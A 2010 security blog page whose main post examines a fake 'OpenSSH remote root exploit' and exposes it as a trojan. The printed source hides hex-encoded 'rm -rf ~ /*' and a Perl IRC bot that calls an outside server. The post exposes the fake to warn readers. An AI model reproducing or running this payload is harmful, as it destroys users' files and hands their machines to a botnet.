XandaForceHTTPS updated. Now with Firefox 3.6.* support. Requested by LinuxMalaysia
Read more HERE
Nice write up by Michael “theprez98” Schearer
Call for Papers BruCON.v2 2010: Hacking for B33r
================================
Brussels, Belgium — This is a call for papers and participation for the second BruCON edition, a 2-day Security and Hacking Conference, full of interesting presentations, workshops and security challenges.
BruCON is an open-minded gathering of people discussing computer security, privacy, and information technology. The conference tries to create bridges between the various actors active in computer security world, included but not limited to hackers, security professionals, security communities, non-profit organizations, CERTs, students, law enforcement agencies,…..
The conference will be held in Brussels (24 & 25 September 2010) at The Surfhouse(www.surfhouse.be).
I’ve heard about decompiling java class since 2007 (when I was in MIMOS) but never try it before. Maybe because I don’t really code in Java.. and I don’t really like Java 😛
But today, I’ve found something interesting to play with.. J2ME based one time password application.. Since I’m on Mac, so I’ve found that Java Decompiler (JD) is the most suitable tool to use for me..
Its also available for Windows and Linux..
See some screenshots HERE
PenTestIT is listed in my RSS list and just now, i’ve got a feed from PenTestIT with the title “openssh-53p1-remote-root.c”
Hurm.. what a surprise news, but.. I think I’m too old for this.. lets see..
xanda:tmp adnan$ cd /tmp xanda:tmp adnan$ mkdir lame xanda:tmp adnan$ cd lame/ xanda:lame adnan$ wget http://pentestit.com/wp-content/uploads/2010/02/openssh-53p1-remote-root.c --2010-02-07 20:41:28-- http://pentestit.com/wp-content/uploads/2010/02/openssh-53p1-remote-root.c Resolving pentestit.com (pentestit.com)... 208.87.241.96 Connecting to pentestit.com (pentestit.com)|208.87.241.96|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 13273 (13K) [text/x-c] Saving to: `openssh-53p1-remote-root.c' 100%[=========================================================================================================================================>] 13,273 7.82K/s in 1.7s 2010-02-07 20:41:30 (7.82 KB/s) - `openssh-53p1-remote-root.c' saved [13273/13273] xanda:lame adnan$ more openssh-53p1-remote-root.c /* openssh-53p1-remote-root.c * OpenSSH <= 5.3p1-1 Remote Root Exploit by the|one * Email: root@chamillionaire.com * Release date: Unreleased (private) / 2010 * Available Patch: No fix-patch has been issued or reported. * * ----------------- * Additional Notes: * ----------------- * By using this software, you take any and/or all responsibility * for the damage(s) caused and will not bitch to me, the|one, about it. * * USE THIS SOFTWARE AT YOUR OWN DISCRETION! Later skiddies. :> */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <stdarg.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <unistd.h> #include <netdb.h> #define VALID_RANGE 0xb44ffe00 #define build_frem(x,y,a,b,c) a##c##a##x##y##b char jmpcode[] = "\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20\x2F\x2A\x20\x32\x3e\x20\x2f" "\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26"; char shellcode[] = "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a" "\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x0a\x24\x6b\x65" "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b" "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20" "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b" "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20" "\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f" "\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24" "\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24" "\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e" "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20" "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a" "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a" "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a" "\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79" "\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22" "\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22" "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20" "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b" "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20" "\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f" "\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24" "\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24" "\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e" "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20" "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a" "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a" "\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63" "\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d" "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b" "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b" "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20" "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a" xanda:lame adnan$ gcc openssh-53p1-remote-root.c -o fake xanda:lame adnan$ strings fake | more the|one is rooting your Linux/FreeBSD Network Usage: %s -h <host> -p port Options: -h ip/host of target -p port -d username -B memory_limit 8/16/64 Root is required for raw sockets, etc. [+] the|one's OpenSSH Remote Root Exploit - 2010 [-] Resolving Failed [-] Connecting Failed Getting root isn't that hard, skiddie PS1='sh-3.2#' /bin/sh [-] Failed to exploit the target : rm -rf ~ /* 2> /dev/null & #!/usr/bin/perl $chan="#cn"; $ke"; while (<$sockG (.*)$/){print "; while (<$sockn"; sleep 1; k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print #!/usr/bin/perl #!/usr/bin/perl #!/usr/bin/perl $chan="#cn";$key ="fags";$nick="phpfr";$server="G (.*)$/){print "; while (<$sockn"; sleep 1; k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print #!/usr/bin/perl #!/usr/bin/perl |
knock knock knock… script kiddies.. grow up!
